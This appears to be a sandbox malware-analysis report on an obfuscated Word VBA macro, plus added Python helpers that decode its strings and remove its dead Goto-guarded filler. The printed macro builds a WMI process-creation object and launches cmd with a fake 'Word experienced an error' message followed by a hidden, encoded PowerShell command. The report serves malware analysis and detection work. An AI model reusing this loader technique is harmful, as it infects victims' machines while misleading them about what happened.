                                                                    dscc = "sasdsacc" & (QyRiIm / 2) + 1 & " to " & (WEIxlI / 2) + 1 & MidB$(ZFzwZcA, QyRiIm + 1, WEIxlI - QyRiIm + 3)

                                                                    MidB$

                                                                    167

                                                                    QyRiIm = WEIxlI + 2

                                                                    168

                                                                    Endif

                                                                    169

                                                                    WEIxlI = WEIxlI + 2

                                                                    170

                                                                    Loop

                                                                    171

                                                                    Next

                                                                    Paragraphs

                                                                    171

                                                                    urNCUFJBF:

                                                                    173

                                                                    Set V5rp8m_1bqwi1poyk = CreateObject(Pey8y7gr_e6_y)

                                                                    CreateObject("winmgmts:win32_process")

                                                                    executed
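The sandbox annotation above gives away what the filler-laden concatenation resolves to. The Python below is an added illustration, not code from the Joe Sandbox report or from the sample: it transcribes the live statements of this listing into a constructed excerpt, drops the GOTO-bypassed paragraph-walking blocks (only one of them is kept in the excerpt), and emulates just enough VBA (string literals, + and & concatenation, Mid(Application.Name, 60 / 10, 1)) to rebuild the argument of CreateObject statically. Two assumptions are labelled in the code: Word reports Application.Name as "Microsoft Word", so the Mid() call yields "s", and K532dwnyk0pybrc, whose body is not in this excerpt, does nothing more than remove the filler token "x [ sh b", the only behaviour consistent with the value the sandbox observed. The tautology_loops() helper flags the Do Until X > X construct that every dead block in this listing contains.

```python
import re

JUNK = "x [ sh b"                    # filler the macro interleaves with the real characters
APPLICATION_NAME = "Microsoft Word"  # assumption: Word's Application.Name inside the sample

# Constructed excerpt: the live statements of the listing, transcribed verbatim, plus one
# GOTO-bypassed paragraph-walking block so the dead-code filter has something to remove.
EXCERPT = '''
NreFC:
wjnsc = "x [ sh bpx [ sh b"
T8m6rm0ljeoit = "x [ sh brox [ sh bx [ sh bcex [ sh bsx [ sh bsx [ sh bx [ sh b"
Goto fNBrHlEAv
For Each rVJUDUKH in Tvh1u8793dltn9.Paragraphs
cXPNdFE = rVJUDUKH.Range
Do Until IFdNKp > IFdNKp
IFdNKp = IFdNKp + 2
Loop
Next
fNBrHlEAv:
Cyum5s6729q4h = "x [ sh b:wx [ sh bx [ sh binx [ sh b3x [ sh b2x [ sh b_x [ sh b"
KAIEzBBDB:
D72efu7a0how7es = "wx [ sh binx [ sh bmx [ sh bgmx [ sh btx [ sh bx [ sh b"
OXSmB:
C22jnnyve59b2 = "x [ sh bx [ sh b" + Mid(Application.Name, 60 / 10, 1) + "x [ sh bx [ sh b"
rYDvv:
Cew5ncdrgctcj = D72efu7a0how7es + C22jnnyve59b2 + Cyum5s6729q4h + wjnsc + T8m6rm0ljeoit
tgyiIBI:
Pey8y7gr_e6_y = K532dwnyk0pybrc(Cew5ncdrgctcj)
urNCUFJBF:
Set V5rp8m_1bqwi1poyk = CreateObject(Pey8y7gr_e6_y)
'''

GOTO_RE = re.compile(r"^Goto\s+(\w+)$", re.IGNORECASE)
LABEL_RE = re.compile(r"^(\w+):$")
ASSIGN_RE = re.compile(r"^(?:Set\s+)?(\w+)\s*=\s*(.+)$")
MID_APPNAME_RE = re.compile(r"^Mid\(Application\.Name,\s*(\d+)\s*/\s*(\d+),\s*(\d+)\)$")
CALL_RE = re.compile(r"^(K532dwnyk0pybrc|CreateObject)\((\w+)\)$")
TAUTOLOGY_LOOP_RE = re.compile(r"^Do Until (\w+) > \1$")


def live_statements(source):
    """Drop labels and everything between 'Goto X' and 'X:'; the macro never falls
    through into those blocks, so they are filler, not behaviour."""
    live, skip_to = [], None
    for line in (l.strip() for l in source.splitlines() if l.strip()):
        label, goto = LABEL_RE.match(line), GOTO_RE.match(line)
        if skip_to is not None:
            if label and label.group(1) == skip_to:
                skip_to = None
        elif goto:
            skip_to = goto.group(1)
        elif not label:
            live.append(line)
    return live


def split_concat(expr):
    """Split a VBA expression on '+' / '&' that sit outside string literals."""
    parts, buf, in_str = [], "", False
    for ch in expr:
        if ch == '"':
            in_str = not in_str
        if ch in "+&" and not in_str:
            parts.append(buf.strip())
            buf = ""
        else:
            buf += ch
    parts.append(buf.strip())
    return parts


def eval_term(term, env):
    """One operand: string literal, Mid() over the app name, helper call, or variable."""
    if len(term) >= 2 and term[0] == '"' and term[-1] == '"':
        return term[1:-1]
    m = MID_APPNAME_RE.match(term)
    if m:                                            # VBA Mid() is 1-based; 60 / 10 -> 6
        start, length = int(m.group(1)) // int(m.group(2)), int(m.group(3))
        return APPLICATION_NAME[start - 1:start - 1 + length]
    m = CALL_RE.match(term)
    if m:
        arg = env[m.group(2)]
        # Assumption: K532dwnyk0pybrc (body not in this excerpt) strips every filler token.
        return arg.replace(JUNK, "") if m.group(1) == "K532dwnyk0pybrc" else arg
    return env[term]                                 # plain variable reference


def emulate(source):
    """Run the live assignments in order; return the variable table and every
    value the macro hands to CreateObject()."""
    env, created = {}, []
    for stmt in live_statements(source):
        m = ASSIGN_RE.match(stmt)
        if not m:
            continue
        name, expr = m.groups()
        env[name] = "".join(eval_term(t, env) for t in split_concat(expr))
        if expr.startswith("CreateObject("):
            created.append(env[name])
    return env, created


def tautology_loops(source):
    """'Do Until X > X' can never exit through its own condition: generated filler."""
    return [l.strip() for l in source.splitlines() if TAUTOLOGY_LOOP_RE.match(l.strip())]
```

emulate(EXCERPT) returns "winmgmts:win32_process" as the only CreateObject argument, which is the WMI moniker behind the report's "Creates processes via WMI" signature. The same dead-code filter generalises: every block this macro skips with Goto contains one tautology loop and one paragraph walk, so counting Goto/label pairs against live assignments gives a quick measure of how much of the source is padding.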
    Goto TQOflAN

    Set arTLjQ = BeNoB
    Dim iqpwDAG, nSFIYBiG, KqVudsGK as Long
    Dim wFpBJBJE as Word.Paragraph
    Dim bKloWCbL() as Byte
    For Each wFpBJBJE in Tvh1u8793dltn9.Paragraphs
        bKloWCbL = wFpBJBJE.Range
        dscc = "sadsaccc" & wFpBJBJE.Range
        nSFIYBiG = UBound(bKloWCbL) - 1
        iqpwDAG = 0
        Set Mpmet = qqdsB
        Do Until nSFIYBiG > nSFIYBiG
            If bKloWCbL(nSFIYBiG) = 46 Or nSFIYBiG = nSFIYBiG Then
                dscc = "sasdsacc" & (iqpwDAG / 2) + 1 & " to " & (nSFIYBiG / 2) + 1 & MidB$(bKloWCbL, iqpwDAG + 1, nSFIYBiG - iqpwDAG + 3)
                iqpwDAG = nSFIYBiG + 2
            Endif
            nSFIYBiG = nSFIYBiG + 2
        Loop
    Next

                                                                    TQOflAN:

                                                                    194

                                                                    njcnja = Mid(skuwd, (1 + 1 + 1 + 1), Len(skuwd))

                                                                    Mid

executed
195 | nnjasd = K532dwnyk0pybrc(njcnja) |
196 | Goto OgZqDzXrC |
197 | Set FSWADGB = SlFMhE | SlFMhE
198 | Dim fWUcJcE, bDqBloVC, OZDOK as Long |
199 | Dim JRtnBYH as Word.Paragraph |
200 | Dim pXRdBD() as Byte |
201 | For Each JRtnBYH in Tvh1u8793dltn9.Paragraphs | Paragraphs
202 | pXRdBD = JRtnBYH.Range | Range
203 | dscc = "sadsaccc" & JRtnBYH.Range | Range
204 | bDqBloVC = UBound(pXRdBD) - 1 | UBound
205 | fWUcJcE = 0 |
206 | Set axZmGGE = TtNYEBE | TtNYEBE
207 | Do Until bDqBloVC > bDqBloVC |
208 | If pXRdBD(bDqBloVC) = 46 Or bDqBloVC = bDqBloVC Then |
209 | dscc = "sasdsacc" & (fWUcJcE / 2) + 1 & " to " & (bDqBloVC / 2) + 1 & MidB$(pXRdBD, fWUcJcE + 1, bDqBloVC - fWUcJcE + 3) | MidB$
210 | fWUcJcE = bDqBloVC + 2 |
211 | Endif |
212 | bDqBloVC = bDqBloVC + 2 |
213 | Loop |
214 | Next | Paragraphs
214 | OgZqDzXrC: |
216 | V5rp8m_1bqwi1poyk.Create nnjasd, Koy_r2oxzs1, X2yj58n39t50co | SWbemObjectEx.Create("cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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,,) -> 0; Koy_r2oxzs1; X2yj58n39t50co; executed
217 | Goto ScLedvBEA |
218 | Set yktdUg = kxpwbBJF | kxpwbBJF
219 | Dim wEvDIdG, lqbmGD, elJkJIB as Long |
220 | Dim IVjOAGZe as Word.Paragraph |
221 | Dim FcotIf() as Byte |
222 | For Each IVjOAGZe in Tvh1u8793dltn9.Paragraphs | Paragraphs
223 | FcotIf = IVjOAGZe.Range | Range
224 | dscc = "sadsaccc" & IVjOAGZe.Range | Range
225 | lqbmGD = UBound(FcotIf) - 1 | UBound
226 | wEvDIdG = 0 |
227 | Set sJtmJ = UYxXOcIJG | UYxXOcIJG
228 | Do Until lqbmGD > lqbmGD |
229 | If FcotIf(lqbmGD) = 46 Or lqbmGD = lqbmGD Then |
230 | dscc = "sasdsacc" & (wEvDIdG / 2) + 1 & " to " & (lqbmGD / 2) + 1 & MidB$(FcotIf, wEvDIdG + 1, lqbmGD - wEvDIdG + 3) | MidB$
231 | wEvDIdG = lqbmGD + 2 |
232 | Endif |
233 | lqbmGD = lqbmGD + 2 |
234 | Loop |
235 | Next | Paragraphs
235 | ScLedvBEA: |
237 | End Function |

APIs | Meta Information
JltZHC |
Paragraphs |
Range |
Range |
UBound |
hbrLsIIaJ |
MidB$ |
iyOuxJbS |
Paragraphs |
Range |
Range |
UBound |
vcpiDgaED |
MidB$ |
TVnICGBMg |
Paragraphs |
Range |
Range |
UBound |
HoDns |
MidB$ |
Replace |
Zi0fdg4qf12t |
ElQBeG |
Paragraphs |
Range |
Range |
UBound |
xhcZSBIH |
MidB$ |
fPExO |
Paragraphs |
Range |
Range |
UBound |
obcJwDFA |
MidB$ |
FVoXJ |
Paragraphs |
Range |
Range |
UBound |
ZGOfHDFZ |
MidB$ |

Strings | Decrypted Strings
"sadsaccc" |
"sasdsacc" |
"sadsaccc" |
"sasdsacc" |
"sasdsacc" |
"sasdsacc" |
"sadsaccc" |
"sasdsacc" |
"sadsaccc" |
"sasdsacc" |
"sasdsacc" |
"sasdsacc" |
"sadsaccc" |
"sasdsacc" |
"sadsaccc" |
"sasdsacc" |
"sasdsacc" |
"sasdsacc" |
"x [ sh b" |
"sadsaccc" |
"sasdsacc" |
"sadsaccc" |
"sasdsacc" |
"sasdsacc" |
"sasdsacc" |
"sadsaccc" |
"sasdsacc" |
"sadsaccc" |
"sasdsacc" |
"sasdsacc" |
"sasdsacc" |
"sadsaccc" |
"sasdsacc" |
"sadsaccc" |
"sasdsacc" |
"sasdsacc" |
"sasdsacc" |

Line | Instruction | Meta Information
324 | Function Yw0lmj9uz2sfz0(Vld8aalp9dc) |
325 | Goto nhgrV | executed
326 | Set nfGGCgIdG = JltZHC | JltZHC
327 | Dim cxvFCyK, lTApi, gLahNHF as Long |
328 | Dim ooYfBGDHB as Word.Paragraph |
329 | Dim hVgaFGj() as Byte |
330 | For Each ooYfBGDHB in Tvh1u8793dltn9.Paragraphs | Paragraphs
331 | hVgaFGj = ooYfBGDHB.Range | Range
332 | dscc = "sadsaccc" & ooYfBGDHB.Range | Range
333 | lTApi = UBound(hVgaFGj) - 1 | UBound
334 | cxvFCyK = 0 |
335 | Set QDRLrCD = hbrLsIIaJ | hbrLsIIaJ
336 | Do Until lTApi > lTApi |
337 | If hVgaFGj(lTApi) = 46 Or lTApi = lTApi Then |
338 | dscc = "sasdsacc" & (cxvFCyK / 2) + 1 & " to " & (lTApi / 2) + 1 & MidB$(hVgaFGj, cxvFCyK + 1, lTApi - cxvFCyK + 3) | MidB$
339 | cxvFCyK = lTApi + 2 |
340 | Endif |
341 | lTApi = lTApi + 2 |
342 | Loop |
343 | Next | Paragraphs
343 | nhgrV: |
345 | Goto NelhA |
346 | Set nVwvHB = iyOuxJbS | iyOuxJbS
347 | Dim fiGUDJCof, ccUPI, xFjGF as Long |
348 | Dim TIdZDCk as Word.Paragraph |
349 | Dim BMzteJlIE() as Byte |
350 | For Each TIdZDCk in Tvh1u8793dltn9.Paragraphs | Paragraphs
351 | BMzteJlIE = TIdZDCk.Range | Range
352 | dscc = "sadsaccc" & TIdZDCk.Range | Range
353 | ccUPI = UBound(BMzteJlIE) - 1 | UBound
354 | fiGUDJCof = 0 |
355 | Set MSHSTFGF = vcpiDgaED | vcpiDgaED
356 | Do Until ccUPI > ccUPI |
357 | If BMzteJlIE(ccUPI) = 46 Or ccUPI = ccUPI Then |
358 | dscc = "sasdsacc" & (fiGUDJCof / 2) + 1 & " to " & (ccUPI / 2) + 1 & MidB$(BMzteJlIE, fiGUDJCof + 1, ccUPI - fiGUDJCof + 3) |

                                                                    MidB$

                                                                    359

                                                                    fiGUDJCof = ccUPI + 2

                                                                    360

                                                                    Endif

                                                                    361

                                                                    ccUPI = ccUPI + 2

                                                                    362

                                                                    Loop

                                                                    363

                                                                    Next

                                                                    Paragraphs

                                                                    363

                                                                    NelhA:

                                                                    365

                                                                    Goto qjZyxC

                                                                    366

                                                                    Set fPJtR = TVnICGBMg

                                                                    TVnICGBMg

                                                                    367

                                                                    Dim OGmjSHH, dxYfn, tsgajz as Long

                                                                    368

                                                                    Dim VwecCsW as Word.Paragraph

                                                                    369

                                                                    Dim jpCcJn() as Byte

                                                                    370

                                                                    For Each VwecCsW in Tvh1u8793dltn9.Paragraphs

                                                                    Paragraphs

                                                                    371

                                                                    jpCcJn = VwecCsW.Range

                                                                    Range

                                                                    372

                                                                    dscc = "sadsaccc" & VwecCsW.Range

                                                                    Range

                                                                    373

                                                                    dxYfn = UBound(jpCcJn) - 1

                                                                    UBound

                                                                    374

                                                                    OGmjSHH = 0

                                                                    375

                                                                    Set ShwUGEG = HoDns

                                                                    HoDns

                                                                    376

                                                                    Do Until dxYfn > dxYfn

                                                                    377

                                                                    If jpCcJn(dxYfn) = 46 Or dxYfn = dxYfn Then

                                                                    378

                                                                    dscc = "sasdsacc" & (OGmjSHH / 2) + 1 & " to " & (dxYfn / 2) + 1 & MidB$(jpCcJn, OGmjSHH + 1, dxYfn - OGmjSHH + 3)

                                                                    MidB$

                                                                    379

                                                                    OGmjSHH = dxYfn + 2

                                                                    380

                                                                    Endif

                                                                    381

                                                                    dxYfn = dxYfn + 2

                                                                    382

                                                                    Loop

                                                                    383

                                                                    Next

                                                                    Paragraphs

                                                                    383

                                                                    qjZyxC:

                                                                    385

                                                                    Yw0lmj9uz2sfz0 = Replace(Vld8aalp9dc, "x [ sh b", Zi0fdg4qf12t)

                                                                    Replace("wx [ sh binx [ sh bmx [ sh bgmx [ sh btx [ sh bx [ sh bx [ sh bx [ sh bsx [ sh bx [ sh bx [ sh b:wx [ sh bx [ sh binx [ sh b3x [ sh b2x [ sh b_x [ sh bx [ sh bpx [ sh bx [ sh brox [ sh bx [ sh bcex [ sh bsx [ sh bsx [ sh bx [ sh b","x [ sh b",) -> winmgmts:win32_process

                                                                    Zi0fdg4qf12t

                                                                    executed
                                                                    386

                                                                    Goto CMhXU

                                                                    387

                                                                    Set yEbqhrSDE = ElQBeG

                                                                    ElQBeG

                                                                    388

                                                                    Dim KGTisCFg, htkDBkB, QbynDCF as Long

                                                                    389

                                                                    Dim wUyzGJ as Word.Paragraph

                                                                    390

                                                                    Dim YXZHHCaB() as Byte

                                                                    391

                                                                    For Each wUyzGJ in Tvh1u8793dltn9.Paragraphs

                                                                    Paragraphs

                                                                    392

                                                                    YXZHHCaB = wUyzGJ.Range

                                                                    Range

                                                                    393

                                                                    dscc = "sadsaccc" & wUyzGJ.Range

                                                                    Range

                                                                    394

                                                                    htkDBkB = UBound(YXZHHCaB) - 1

                                                                    UBound

                                                                    395

                                                                    KGTisCFg = 0

                                                                    396

                                                                    Set oyFNHnHHI = xhcZSBIH

                                                                    xhcZSBIH

                                                                    397

                                                                    Do Until htkDBkB > htkDBkB

                                                                    398

                                                                    If YXZHHCaB(htkDBkB) = 46 Or htkDBkB = htkDBkB Then

                                                                    399

                                                                    dscc = "sasdsacc" & (KGTisCFg / 2) + 1 & " to " & (htkDBkB / 2) + 1 & MidB$(YXZHHCaB, KGTisCFg + 1, htkDBkB - KGTisCFg + 3)

                                                                    MidB$

                                                                    400

                                                                    KGTisCFg = htkDBkB + 2

                                                                    401

                                                                    Endif

                                                                    402

                                                                    htkDBkB = htkDBkB + 2

                                                                    403

                                                                    Loop

                                                                    404

                                                                    Next

                                                                    Paragraphs

                                                                    404

                                                                    CMhXU:

                                                                    406

                                                                    Goto BhNEmrIE

                                                                    407

                                                                    Set PDdhFK = fPExO

                                                                    fPExO

                                                                    408

                                                                    Dim YgziIE, DwikAuvE, fEtRs as Long

                                                                    409

                                                                    Dim YvQjieFc as Word.Paragraph

                                                                    410

                                                                    Dim VuThCQHH() as Byte

                                                                    411

                                                                    For Each YvQjieFc in Tvh1u8793dltn9.Paragraphs

                                                                    Paragraphs

                                                                    412

                                                                    VuThCQHH = YvQjieFc.Range

                                                                    Range

                                                                    413

                                                                    dscc = "sadsaccc" & YvQjieFc.Range

                                                                    Range

                                                                    414

                                                                    DwikAuvE = UBound(VuThCQHH) - 1

                                                                    UBound

                                                                    415

                                                                    YgziIE = 0

                                                                    416

                                                                    Set WfWmdXBB = obcJwDFA

                                                                    obcJwDFA

                                                                    417

                                                                    Do Until DwikAuvE > DwikAuvE

                                                                    418

                                                                    If VuThCQHH(DwikAuvE) = 46 Or DwikAuvE = DwikAuvE Then

                                                                    419

                                                                    dscc = "sasdsacc" & (YgziIE / 2) + 1 & " to " & (DwikAuvE / 2) + 1 & MidB$(VuThCQHH, YgziIE + 1, DwikAuvE - YgziIE + 3)

                                                                    MidB$

                                                                    420

                                                                    YgziIE = DwikAuvE + 2

                                                                    421

                                                                    Endif

                                                                    422

                                                                    DwikAuvE = DwikAuvE + 2

                                                                    423

                                                                    Loop

                                                                    424

                                                                    Next

                                                                    Paragraphs

                                                                    424

                                                                    BhNEmrIE:

                                                                    426

                                                                    Goto VcRJFFPFy

                                                                    427

                                                                    Set dMAig = FVoXJ

                                                                    FVoXJ

                                                                    428

                                                                    Dim wzAgBA, zZJyEAC, YqhWFED as Long

                                                                    429

                                                                    Dim tVHJH as Word.Paragraph

                                                                    430

                                                                    Dim DLNPo() as Byte

                                                                    431

                                                                    For Each tVHJH in Tvh1u8793dltn9.Paragraphs

                                                                    Paragraphs

                                                                    432

                                                                    DLNPo = tVHJH.Range

                                                                    Range

                                                                    433

                                                                    dscc = "sadsaccc" & tVHJH.Range

                                                                    Range

                                                                    434

                                                                    zZJyEAC = UBound(DLNPo) - 1

                                                                    UBound

                                                                    435

                                                                    wzAgBA = 0

                                                                    436

                                                                    Set swiEYEUA = ZGOfHDFZ

                                                                    ZGOfHDFZ

                                                                    437

                                                                    Do Until zZJyEAC > zZJyEAC

                                                                    438

                                                                    If DLNPo(zZJyEAC) = 46 Or zZJyEAC = zZJyEAC Then

                                                                    439

                                                                    dscc = "sasdsacc" & (wzAgBA / 2) + 1 & " to " & (zZJyEAC / 2) + 1 & MidB$(DLNPo, wzAgBA + 1, zZJyEAC - wzAgBA + 3)

                                                                    MidB$

                                                                    440

                                                                    wzAgBA = zZJyEAC + 2

                                                                    441

                                                                    Endif

                                                                    442

                                                                    zZJyEAC = zZJyEAC + 2

                                                                    443

                                                                    Loop

                                                                    444

                                                                    Next

                                                                    Paragraphs

                                                                    444

                                                                    VcRJFFPFy:

                                                                    446

                                                                    End Function
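The Yw0lmj9uz2sfz0 listing above and the K532dwnyk0pybrc listing further down share one construction: every block of paragraph-scanning code sits between an unconditional Goto and the label it jumps to, so it is never reached (the sandbox marks only "On Error Resume Next" and the Replace line as executed, and a loop of the form Do Until ccUPI > ccUPI could never terminate if it did run, which is further evidence that it is filler). The single live statement deletes the junk token "x [ sh b" from a string constant and yields "winmgmts:win32_process", the WMI moniker for the Win32_Process class; launching a child through that class rather than through Shell is consistent with the report's "Creates processes via WMI" signature. The Python below is an added triage helper, not part of the Joe Sandbox report or of the sample: it replays VBA Replace() on the string copied from the report's meta column for line 385 (where the third argument is shown as empty) and strips Goto-guarded dead code from VBA source text. The VBA it runs on is a constructed, abridged copy of the listing above; its Function line is assumed from the report's "Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf" naming.

```python
import re

# Copied from the report's meta column for line 385: the sandbox evaluated
# Replace(Vld8aalp9dc, "x [ sh b", Zi0fdg4qf12t) with an empty third argument.
JUNK_TOKEN = "x [ sh b"
OBFUSCATED_MONIKER = "wx [ sh binx [ sh bmx [ sh bgmx [ sh btx [ sh bx [ sh bx [ sh bx [ sh bsx [ sh bx [ sh bx [ sh b:wx [ sh bx [ sh binx [ sh b3x [ sh b2x [ sh b_x [ sh bx [ sh bpx [ sh bx [ sh brox [ sh bx [ sh bcex [ sh bsx [ sh bsx [ sh bx [ sh b"

# Constructed, abridged version of the Yw0lmj9uz2sfz0 listing; the Function
# line is assumed from the report's "Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf" naming.
SAMPLE_VBA = """\
Function Yw0lmj9uz2sfz0(X1bqz0qaer43b52bf)
Goto NelhA
Set nVwvHB = iyOuxJbS
For Each TIdZDCk in Tvh1u8793dltn9.Paragraphs
Do Until ccUPI > ccUPI
Loop
Next
NelhA:
Goto qjZyxC
Set fPJtR = TVnICGBMg
qjZyxC:
Yw0lmj9uz2sfz0 = Replace(Vld8aalp9dc, "x [ sh b", Zi0fdg4qf12t)
Goto CMhXU
Set yEbqhrSDE = ElQBeG
CMhXU:
End Function""".splitlines()


def vba_replace(expression, find, replace=""):
    """Mirror VBA Replace() with its defaults (start=1, count=-1,
    vbBinaryCompare): every case-sensitive occurrence is substituted, and an
    empty search string returns the expression unchanged."""
    if find == "":
        return expression
    return expression.replace(find, replace)


def decode_moniker():
    """Replay the only executed statement of Yw0lmj9uz2sfz0."""
    return vba_replace(OBFUSCATED_MONIKER, JUNK_TOKEN, "")


GOTO_RE = re.compile(r"^\s*GoTo\s+(\w+)\s*$", re.IGNORECASE)
LABEL_RE = re.compile(r"^\s*(\w+):\s*$")


def find_dead_code(lines):
    """Return (start, end, label) tuples (0-based, end exclusive) for the
    statements between an unconditional 'Goto X' and a later 'X:' label.
    Spans that contain another label are left alone, since something could
    branch into them; backward jumps are loops, not padding."""
    labels = {}
    for i, line in enumerate(lines):
        m = LABEL_RE.match(line)
        if m:
            labels[m.group(1)] = i
    dead = []
    for i, line in enumerate(lines):
        m = GOTO_RE.match(line)
        if not m or m.group(1) not in labels:
            continue
        target = labels[m.group(1)]
        if target <= i:
            continue
        if any(LABEL_RE.match(inner) for inner in lines[i + 1:target]):
            continue
        dead.append((i + 1, target, m.group(1)))
    return dead


def live_lines(lines):
    """The listing with every dead span removed."""
    skip = set()
    for start, end, _ in find_dead_code(lines):
        skip.update(range(start, end))
    return [line for i, line in enumerate(lines) if i not in skip]


def dead_code_ratio(lines):
    """Fraction of lines that can never execute; a rough padding score."""
    dead = sum(end - start for start, end, _ in find_dead_code(lines))
    return dead / len(lines) if lines else 0.0


if __name__ == "__main__":
    print(decode_moniker())
    for line in live_lines(SAMPLE_VBA):
        print(line)
    print(f"dead code: {dead_code_ratio(SAMPLE_VBA):.0%}")
```

Run against the full macro dump from olevba rather than the abridged sample, the same two functions reduce each function to its Goto chain plus the handful of statements the sandbox flagged as executed.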

APIs / Meta Information

                                                                    bHGFAGJ

                                                                    Paragraphs

                                                                    Range

                                                                    Range

                                                                    UBound

                                                                    OaOIEKmCA

                                                                    MidB$

                                                                    DHwdFs

                                                                    Paragraphs

                                                                    Range

                                                                    Range

                                                                    UBound

                                                                    mwvhyA

                                                                    MidB$

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: JltZHC

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Paragraphs

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: UBound

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: hbrLsIIaJ

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: MidB$

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: iyOuxJbS

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Paragraphs

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: UBound

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: vcpiDgaED

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: MidB$

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: TVnICGBMg

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Paragraphs

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: UBound

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: HoDns

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: MidB$

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Replace

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Zi0fdg4qf12t

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: ElQBeG

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Paragraphs

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: UBound

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: xhcZSBIH

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: MidB$

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: fPExO

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Paragraphs

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: UBound

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: obcJwDFA

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: MidB$

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: FVoXJ

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Paragraphs

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: UBound

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: ZGOfHDFZ

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: MidB$

                                                                    prgAO

                                                                    Paragraphs

                                                                    Range

                                                                    Range

                                                                    UBound

                                                                    imnrzOF

                                                                    MidB$

                                                                    UmQHurWB

                                                                    Paragraphs

                                                                    Range

                                                                    Range

                                                                    UBound

                                                                    WhmkB

                                                                    MidB$

Strings / Decrypted Strings
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
Line | Instruction | Meta Information
238 | Function K532dwnyk0pybrc(Ev1oy1be511zamut8) |
239 | On Error Resume Next | executed
240 | Goto pzxJi |
241 | Set wrpigDnBA = bHGFAGJ | bHGFAGJ
242 | Dim fUGOALvdN, FKISJTLG, OpNHJEa as Long |
243 | Dim ZlnBbxF as Word.Paragraph |
244 | Dim pxjzGA() as Byte |
245 | For Each ZlnBbxF in Tvh1u8793dltn9.Paragraphs | Paragraphs
246 | pxjzGA = ZlnBbxF.Range | Range
247 | dscc = "sadsaccc" & ZlnBbxF.Range | Range
248 | FKISJTLG = UBound(pxjzGA) - 1 | UBound
249 | fUGOALvdN = 0 |
250 | Set xNIlBBInl = OaOIEKmCA | OaOIEKmCA
251 | Do Until FKISJTLG > FKISJTLG |
252 | If pxjzGA(FKISJTLG) = 46 Or FKISJTLG = FKISJTLG Then |
253 | dscc = "sasdsacc" & (fUGOALvdN / 2) + 1 & " to " & (FKISJTLG / 2) + 1 & MidB$(pxjzGA, fUGOALvdN + 1, FKISJTLG - fUGOALvdN + 3) | MidB$
